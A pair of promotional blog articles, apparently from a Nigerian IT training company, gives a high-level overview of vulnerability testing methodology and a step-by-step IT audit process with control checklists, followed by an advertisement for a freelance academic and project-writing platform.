As we already know, confidentiality, integrity and availability which are the three cores of IT security. Once any or all of these elements are compromised, then one can say there is a security vulnerability. Infact, a single security vulnerability has the potential of compromising one or all of these elements. For example, the confidentiality can be compromised if there is an information disclosure vulnerability while the compromise of integrity and availability can be as a result of remote code execution.

What is Vulnerability Testing?

It can also be referred to as vulnerability assessment which is a software testing technique that is conducted in order to evaluate the inherent risk in an IT system and measures employed to reduce or curb the probability of the event.

Vulnerability testing has some similarities with risk assessment and these assessments can be performed following some steps as highlighted below.

  • Developing a catalogue for assets and resources in the system.
  • Assigning rank orders to quantify resources by value and importance.
  • Identifying the potential threats and vulnerabilities to the resources.
  • Eliminating totally or mitigating the high ranked vulnerabilities for the most valuable resources.

Vulnerability testing depends majorly on 2 mechanisms

  • Vulnerability assessment
  • Penetration testing

Objectives of Vulnerability Testing

The common goals and objectives of risk and vulnerability assessments are as follows;

  • To get an accurate inventory of all data and IT assets.
  • To prioritize organizational IT and data assets according to the importance and criticality to the organization
  • To identify and document all the potential risks, threats and vulnerabilities to the organizational infrastructural assets.
  • To prioritize the potential risks, threats and known vulnerabilities based on their impact or criticality on the IT or data assets being affected.
  • To identify and minimize the vulnerability window of the organizational IT and data assets according to the minimum acceptable tolerance level.
  • To curb, mitigate or remediate the identified risks, threats and vulnerabilities and properly plan and budget them based on the criticality of the IT and data assets.
  • To check for compliance with the updated information security laws, regulations, procedures and mandates
  • Just as explained previously, it helps to identify lapses, voids and gaps in the organizations IT security framework and architecture by looking out for specific recommendations.
  • To identify the potential risks, threats and vulnerabilities that an organization’s is susceptible to and to find ways to justify the cost of all the security countermeasures and solutions to be adopted in order to mitigate, eliminate or reduce the identified risks, threats and vulnerabilities.
  • To provide an objective assessment and prompt recommendation to help define the organizations goals and objectives for performing risk and vulnerability assessment.
  • It helps organizations to understand the return on investments (ROI) whenever funds are to be invested in the IT security infrastructure.
  • To scan operating systems, application softwares and the entire network for known vulnerabilities such as insecure authentications and software designs.

                                 Scope of Vulnerability Testing

 

  1. Black Box Testing: It involves performing vulnerability testing from an external network with no prior knowledge of the internal network infrastructure and systems.
  2. White box testing: It involves performing vulnerability testing within an internal network with prior knowledge of the internal network infrastructure and systems. White box testing can also be referred to as internal testing.
  3. Grey box testing: It involves performing vulnerability testing from either an external or internal network with little knowledge of the internal network infrastructure and system. It involves the combination of black box ad white box testing.

Elements of Vulnerability Testing

  • Information Gathering: This can also be referred to as reconnaissance and it deals with obtaining as much information as possible about an IT environment. Information such as Networks, IP addresses, versions of operating systems in use etc. and it is applicable to the 3 scopes of vulnerability assessment.
  • Detection of vulnerability: This process involves the use of vulnerability scanners to scan the IT environment to identify the unknown and potential vulnerabilities.
  • Information analysis and planning: It involves the analysis of all the vulnerabilities that have been identified and further devising a means to penetrate into the network and the systems.

Types of Vulnerability Test

  1. Predefined Tests: These is a vulnerability test that is designed to discover some common vulnerabilities in databases and its environments. Predefined tests can be customized to suit the needs or requirements of an organization. Predefined tests include;
  • Configuration Tests: It checks a database for all configuration settings realted ti security. It looks out for common flaws and mistakes in database configurations. Such configuration issues include;
  • Privelege which include; system level rights, privilege access to database and users, rights of use and creation of objects
  • Configuration: Which include parameter settings for the database and parameter settings for the system level.
  • Authentication: It includes, use of accounts by users, use of remote logins, password policies.
  • Version: This includes, versions of the database and patches for the database.
  • Object: It involves sample databases that have been installed, database layouts that have been recommended and ownership of the databases.
  • Behavioral Tests: This test type checks and analyses the security posture and wellbeing of the database environment. It does this by observing the database when it is in real time mode and checking how information is manipulated. Some of the behavioral tests include;
  • Violations of access rules
  • Failures in excessive logins
  • Errors in the excessive SQL
  • Access to default users
  • Logins at after hours
  • Execution of DDL, DBCC commands from the client side of the database
  • Calls for stored procedure checks
  • Ensures user ids are not accessed from multiple IP addresses
  1. Query- based vulnerability tests: This test type can either be a pre-defined test or a user-defined test that can be created easily and quickly by modifying SQL queries which can be run against database entities or resources.
  2. CVE (Common Vulnerabilities and Exposures) Tests: This test type monitors and exposes common vulnerabilities from the MITRE corporation and further adds the results of the test for related vulnerabilities that are related to the database.
  3. CAS-based Tests: This test type can either be a predefined test or a user-defined test which is based on the template of a CAS item found in the OS script command. It uses the collected data. Users can therefore check which of the template items and tests against the contents in the CAS results.

Vulnerability Testing Methodologies

  1. Setup:
  • Begin the documentation process of all assets
  • Secure permissions to credentials and assets
  • Perform tools update
  • Configure the tools
  1. Execute the Test
  • Run the tools to begin execution
  • Run all the data packets captured (A packet is a unit of data that is crafted to be routed from a source to destination). If a file whether email, HTML, or URL request is being sent from a particular point to another on the internet, the TCP layer of TCP/IP will divide the file into small chunks each having a sequence number on the headers for efficient routing. Now, these small individual chunks are referred to as packets. On the destination end, the packets reassemble to form the original file that was sent while running the assessment tools.
  1. Analyze the vulnerabilities:
  • Define and classify the system resources as well as the network
  • Prioritize the resources based on their importance such as High, Medium, low
  • Identify all potential threats to the assets
  • Based on the priorities, develop a strategy to first handle the most prioritized problems
  • Define and implement measures to mitigate or minimize the consequences of the occurrence of an attack.
  1. Form a Report: Develop a report of all the steps you took to arrive at your results. The report is also important in order to guide to aid future understanding of the system and as well to report to the management of the organization.
  2. Remediation plans: This process involves developing measures and taking the appropriate steps to fix the vulnerabilities.

Responsibilities of a Vulnerability Tester

  1. Unit management such as Information Security Coordinators and Unit IT supervisors
  • They support and enforce the standards, approve and submit the annual risk assessment documents to management
  • They determine the person who maintains the documentation.
  • They also request for the internal audits, procure and assign the necessary resources that are needed to implement the standards and polices.
  • They notify the users and support staff who are involved in performing the test.
  • The also request for any exceptions
  • They supervise and coordinate the vulnerability test and also the remediation processes.
  1. The System administrator and Computing device Administrator
  • They implement the best practices which are needed to comply with the test.
  • They support and comply with the policies.
  • They scan all the systems in the network for compliance to standards devices.
  • They monitor the systems actively for any available patches in other to remediate tasks that can affect the user.
  1. Information security Officer
  • These people approve and oversee the all the vulnerability scans.
  • They review and approve the use of any alternative scanning tools when required.
  • They conduct reviews and risk assessments annually.
  • They authorize the removal of network devices from the network when needed.

 Vulnerability testing focuses more on determining loopholes and weaknesses in an IT infrastructure. In my next article i will try to shed some more light on the tools which can use to perform vulnerability since we already have the standard methodologies to follow in order to perform a detailed vulnerability test.

Soutech ventures offers courses that can better equip and train you on all you need to know with practical hands-on knowledge on vulnerability assessment. Subscribe to our CEH course today on www.soutechventures.com/courses

 

 

A step by step Guide for IT Auditing: SOUTECH Web Security- Penetration Testing company in Nigeria

IT audit attempts to evaluate the controls surrounding data as it relates to confidentiality, integrity, and availability. IT audits ensure that confidentiality of information, ensures the integrity and availability which is a key factor to recovering from an incident.

This is a follow up article to on IT audits but I will be dissecting more on the methodologies and steps to performing audits

 

One of the challenges that audit managements and IT auditing have faced overtime is that it ensures IT audit resources are readily available to conduct IT audits. It audits require a lot of technical skills unlike financial audits, for example, an IT auditor will need a lot of training in web applications in other to audit a web application. Likewise, if they want to an oracle audit, they need to be trained efficiently as well as Windows platforms.

Another problem that audit management faces is in the management of IT auditors, because this because they have to track the timing when compared with the objectives of the audit as well as follow-up time on the measures of corrective actions that the clients take when responding to any previous recommendations and possible findings.

One of the important factors in IT auditing and one in which audit management struggles with consistently, is to ensure that adequate IT audit resources are available to perform the IT audits. Financial audits quite unlike IT audits are very intensive in terms of knowledge, for example, if an IT auditor is performing a Web Application audit, then they need to be trained in web applications; if they are doing an Oracle database audit, they need to be trained in Oracle; if they are doing a Windows operating system audit, they need to have some training in Windows and not just XP, they’ll need exposure to Vista, Windows 7, Server 2003, Server 2008, IIS, SQL-Server, Exchange.

 

Another factor that audit management faces is the actual management of the IT auditors, for not only must they track time against audit objectives, audit management must allow for time to follow-up on corrective actions taken by the client in response to previous findings and/or recommendations.The following are the things that an IT expert needs to do before beginning an audit;

  • Perform a review of the organizational structure of the IT assets
  • Perform a review of all IT policies and procedures
  • Perform a review of all the IT standards
  • Perform a review of the IT documentations
  • Perform a review of the organization’s BIA
  • Conduct an interview the authorized personnel
  • Observe and monitor the processes and the performance of the employees
  • Examine the testing of controls, and the results gotten from the tests.

Steps to Perform IT Audits

1. Understand the Audit Subject Area

  • Perform a tour of all the facilities related to audit
  • Perform a review of the background materials
  • Review the IT and business strategic plans
  • Conduct an interview for the key managers in order to understand business
  • Review audit reports that have been in existence
  • Identify regulations and where they have been applied
  • Identify the areas that have been outsourced

 2.  Perform an Audit Engagement Plan Vocabulary

Subject of the Audit: The area that is to be audited. An example is the information systems related to sales

The objective of the Audit: The purpose of performing the audit. An example is determining if the sales database is safe against data breaches, due to inappropriate authentication, access control, or hacking.

Scope of the Audit:  Streamlining the audit to a specific system, function, or unit, or period of time. An example is the is determining if the scope is constrained to Headquarters for the last year.

3.  Perform Risk Assessment: Risk-Based Auditing

Check Inherent Risk: Determine the susceptibility of the system to a risk. An example is a bank’s inherent risk of being robbed.

Control the risk: If a problem exists that will not be detected by an internal control system. Still using the bank case as an example, if a thief accesses a customer’s account at Money Machine and is not detected

Detection of Risk: An auditor does not detect a problem that does exist. Example as in the case of the bank, if a fraud takes but it is not detected.

Perform an overall risk auditing: Combine all the audit risks.

4.   Audit Engagement Risk Analysis

5.   Prepare an Audit Engagement Plan

  • Develop a risk-based approach
  • Include audit objectives, required resources, timing, scope
  • Comply with all applicable laws
  • Develop an audit program and procedures

6.  Add Detail to Plan

7.  Evaluate Controls:

8. Classification of IT controls

  • Corrective controls: It involves fixing the problems to prevent future problems by using:
  • Contingency planning
  • Backup procedures
  • Detective Controls: These involves finding any form of fraud when it occurs using:
  • Hash totals
  • Check points
  • Duplicate checking
  • Error messages
  • Past-due account reports
  • Review of activity logs
  • Preventive Controls: Preventive control measures include:
  • Programmed edit checks
  • Encryption software
  • Access control softwares
  • A well-designed set of procedures
  • Physical controls
  • Employ only qualified personnel

9.  Evaluate Controls: Simple Control Matrix

  • Test the Vocabulary

Compliance Testing:  A compliance test should take this form

  • Are there controls in place and are they consistently applied?
  • Check access control
  • Ensure program change control
  • Procedure documentation
  • Program documentation
  • Software license audits
  • System log reviews
  • Exception follow-ups

Substantive Testing:  Check the following:

  • Are transactions processed accurately?
  • Is data collected correct and accurate?
  • Double check processing
  • Calculation validation
  • Error checking
  • Operational documentation

If the results for the compliance testing are poor, the substantive testing should increase in type and sample number.

Compliance Testing: It should check the following

  • Control: Is production software controlled?
  • Test: Are production executable files built from production source files?
  • Test: Are proper procedures followed in their release?
  • Control: Is access to the sales database constrained to Least Privilege?
  • Test: Are permissions allocated according to documentation?
  • Test: When persons gain access to the database, can they access only what is allowed?

Substantive Testing

  • Audit: Is financial statement section related to sales accurate?
  • Test: Track the processing of sample transactions through the system by performing calculations manually
  • Test: Test error conditions
  • Audit: Is the tape inventory correct?
  • Test: Search for sample days and verify complete documentation and tape completeness

 Tools for IT Audits

ISACA has Standards and Guidelines related to Audit

  • Section 2200 General Standards
  • Section 2400 Performance Standards
  • Section 2600 Reporting Standards
  • Section 3000 IT Assurance Guidelines
  • Section 3200 Enterprise Topics
  • Section 3400 IT Management Processes
  • Section 3600 IT Audit and Assurance Processes
  • Section 3800 IT Audit and Assurance Management
  • Translate the basic audit objectives into specific IT audit objectives
  • Identify and select the best audit approach to verify and test controls
  • Identify individuals to interview
  • Obtain departmental policies, standards, procedures, guidelines to review
  • Develop audit tools and methodology

IT General Controls Check List

1. Documentation of employees and the organization

  • Draw an organizational Chart
  • Company
  • IT Department
  • Current Phone List/Company Directory
  • Job Descriptions for the IT Department
  • Sample of Employee Evaluation Form
  • List of all the terminations/ disengagements in the last 12 months.
  • Checklist of newly hired employees
  • Termination Checklist
  • IT Project List – Is it being planned, completed in the last 12months on its ongoing?
  • Review of the past year’s management response letter

2.       Documentation of IT policies and procedures

·   Obtain a network architecture diagram and documentation

·   Obtain a network diagram

·   Obtain a diagram and Lists of hosts and servers that are running financial applications

·   Change the management policies and procedures

·   Make an inventory of network hardwares and softwares

·   Determine the computer operations, its policies and procedures

·   Layer down security policies

·   Enforce password policies

·   Acceptable Use Policy

·   Layer down incident response policies

·   Get a curriculum for security awareness training

·    Configure firewalls and rule sets

·    Obtain software policies and procedures

·    Setup remote access policies

·    Setup policies for emails, instant messaging, internet usage

·    Develop a disaster recovery and business contingency plan

·    Setup policies for data backup and data recovery

·    Get backup logs

·    Offsite Tape Rotation Logs

·    Obtain a listing of IT related insurance coverage

·    Get copies of vendor contracts and service level agreements

·    Deploy an organized Help Desk with help desk request tracking forms and trouble tickets

·    Report open and closed tickets

·    Employ batch processing

 

When performing an IT audit, the responsibility of the auditor general is to check if the IT system complies with government IT policies, procedures, standards, laws and regulations. Also, the auditor general should endeavor to use IT audit tools, technical guides and recommended resources by ISACA where appropriate. The resources recommended by ISACA (Information systems Audit and control association should encourage IT audit staff and the team as a whole to be certified. Certifications include but a few;

  • CISA (Certified Information systems Auditor)
  • CIA (Certified Internal Auditor)
  • CISM (Certified Information Security Manager)
  • CGEIT (Certified in the Governance of Enterprise IT)

The Audit reports

After a successful audit process, the IT auditor needs to do a detailed documentation. Here is a list of a few things an auditor needs to include in the audit.

  • Plan and prepare the scope and objectives for the audit
  • Describe the scope of the audit area
  • Draft and audit program
  • Get down the steps performed and gather the audit evidence of the audit
  • If the services of other auditors and IT experts were used and what their contributions were.
  • Document your findings, make conclusions and recommendations
  • Document the audit in relation with document dates and identification
  • Report obtained as a result on the audit performed
  • An evidence of the review for audit supervisory

The audit results should be submitted to the organization upon exit where you can take out time to discuss in details your findings and recommendations. You should be certain of the following;

  • That all the facts and findings noted down on this report are accurate
  • That the recommendations you’ve made are cost-effective, more realistic and there are alternatives which should be negotiated with management
  • That the dates for the recommended implementation will be agreed.

There are some other things you need to consider when you’re preparing to present your final report. You need to consider the audience and if the presentation is going to be done to the audit committee. The audit committee may not be really notice the minutia that goes into the business report. Your report should be done in a timely manner so as to give way for any form of corrections.

Finally, if you come across a significant finding in the course of the IT audit, you should inform management immediately.

Always subscribe to Soutech Ventures where we can handle all your IT solutions especially in the areas of IT audits.

Also enroll for a cyber security, ethical hacking training at SOUTECH.

Professional Freelance Portal in Nigeria: Business and Academic Solutions

project and research nigeria facebook page

SOUTECH Web Consults – (a smart and budding Information Technology (IT) startup is launching a platform with innovative, intelligent, knowledgeable and experienced persons running “Project and Research Nigeria”

“To provide a Smart, Premium and Robust Platform for bespoke solutions to individuals in the college, corporate and business world”- Mission Statement
It is a Premium platform for consultancy in research and Undergraduate, PostGrad & Phd, Work Place and Occupational Project Freelance center.
We will be having 800+ freelance vacancies for professionals and expert and over 3000 Agents globally for the platform.`
www.ProjectAndResearchNg.com  is a team of online experts in Nigeria with freelance partners in other countries. Its services include bringing expert to users of various academic and occupational projects/assignment.
ProjectAndResearchNg.com offers online assistance in various tested fields. Our expert comes from diverse background that has years of experience in academics and other occupational fields. Prerequisite for becoming our expert starts from extensive hands on experience or holding Masters to PhD degrees in their respective field. Also they have years of experience in project writing, thesis writing and dissertation help and essay writing while having hands on experience in their fields.
We provide help in almost all subjects like marketing, finance, law, statistics, medicine, HRM, English, accounting, law and engineering subjects like electrical, mechanical, computer science etc.
Our Job/Project Experts:

Job advert for facbook and jobberman

These experts undergo rigorous series of assessments and testing process before they are part of our team. So, we deliver the best service to students and companies alike. We believe in providing detailed step by step solution of every academic assignment, occupational and business problems.
Experts will also render bespoke professional services to individuals, companies, NGOs, organizations needing professional help in running their projects and businesses.
We deliver non-plagiarized work with proper referencing from peer reviewed team of quality assurance experts to meet global standards.
You might want to be among the premium 800+ experts or 3000 agents worldwide.
For News Updates, Jobs, Connect with us and Like Our Page via:
www.facebook.com/ProjectAndResearchNigeria
www.ProjectAndResearchNg.com
jobs@projectandresearchng.com
+2348034121380

Thanks.